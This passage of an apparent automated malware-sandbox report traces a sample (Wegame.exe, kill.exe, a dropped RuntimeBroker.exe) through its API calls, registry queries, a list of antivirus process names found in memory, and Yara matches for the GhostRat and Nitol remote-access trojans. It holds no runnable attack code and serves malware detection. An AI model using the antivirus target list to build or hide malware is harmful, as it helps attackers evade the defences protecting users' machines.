                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,3_2_10023D68
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,3_2_10027DBB
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,MultiByteToWideChar,3_2_10027E78
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,3_2_10027ECE
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_10023F3D
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,WideCharToMultiByte,3_2_10027F91
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_100241C8
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_100242DB
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,3_2_100244CF
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoA,4_2_6C7C3C77
                    Source: C:\Users\Statr\kill.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_6C7BC42E
                    Source: C:\Users\Statr\kill.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_6C7B965A
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6C7BFEB8
                    Source: C:\Users\Statr\kill.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C7BF748
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6C7BFFAD
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6C7C0054
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6C7C00AF
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_6C7C2947
                    Source: C:\Users\Statr\kill.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C7BFA36
                    Source: C:\Users\Statr\kill.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6C7C2A21
                    Source: C:\Users\Statr\kill.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_6C7BEAEC
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_6C7C0280
                    Source: C:\Users\Statr\kill.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C7C0340
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_6C7C3B42
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_6C7C03E3
                    Source: C:\Users\Statr\kill.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C7C03A7
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F4080
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_005F41A9
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F42B1
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_005F4384
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005EC94A
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetCurrentProcess,TerminateProcess,RevertToSelf,GetCurrentProcess,TerminateProcess,GetCurrentProcess,TerminateProcess,RegDisablePredefinedCache,GetCurrentProcess,TerminateProcess,GetUserDefaultLangID,GetUserDefaultLCID,GetUserDefaultLocaleName,GetCurrentProcess,TerminateProcess,EnumSystemLocalesEx,HeapDestroy,GetCurrentProcess,TerminateProcess,GetCurrentProcess,TerminateProcess,6_2_00572CD0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005ECE98
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_005F3A39
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F3C13
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3CBC
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3D07
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3DA2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_005F3E30
                    Source: C:\Users\Wegame\Wegame.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058CBB6 CreateNamedPipeW,GetCurrentProcess,DuplicateHandle,6_2_0058CBB6
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0043E902 __EH_prolog3_GS,PathFileExistsW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SHCreateDirectoryExW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,PathFileExistsW,CreateFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,memset,ReadFile,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLocalTime,WriteFile,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,CloseHandle,3_2_0043E902
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10022972 InterlockedDecrement,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_10022972
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1001B811 GetVersion,GetCommandLineA,3_2_1001B811
                    Source: C:\Users\Wegame\Wegame.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F-PROT.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spidernt.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nspupsvc.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cpf.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F-PROT.EXE
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBAMSvc.exe
                    Source: kill.exeBinary or memory string: 360Tray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a2guard.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Mcshield.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected GhostRat
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Nitol
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected GhostRat
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Nitol
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3728, type: MEMORYSTR
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00464392 __EH_prolog3_catch_GS,?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_client_id@util_client_info@ierd_tgp@@YAHXZ,?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z,?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z,3_2_00464392
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00464492 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_client_id@util_client_info@ierd_tgp@@YAHXZ,?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z,?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z,3_2_00464492
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0044CC18 ?_Xlength_error@std@@YAXPBD@Z,?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z,3_2_0044CC18
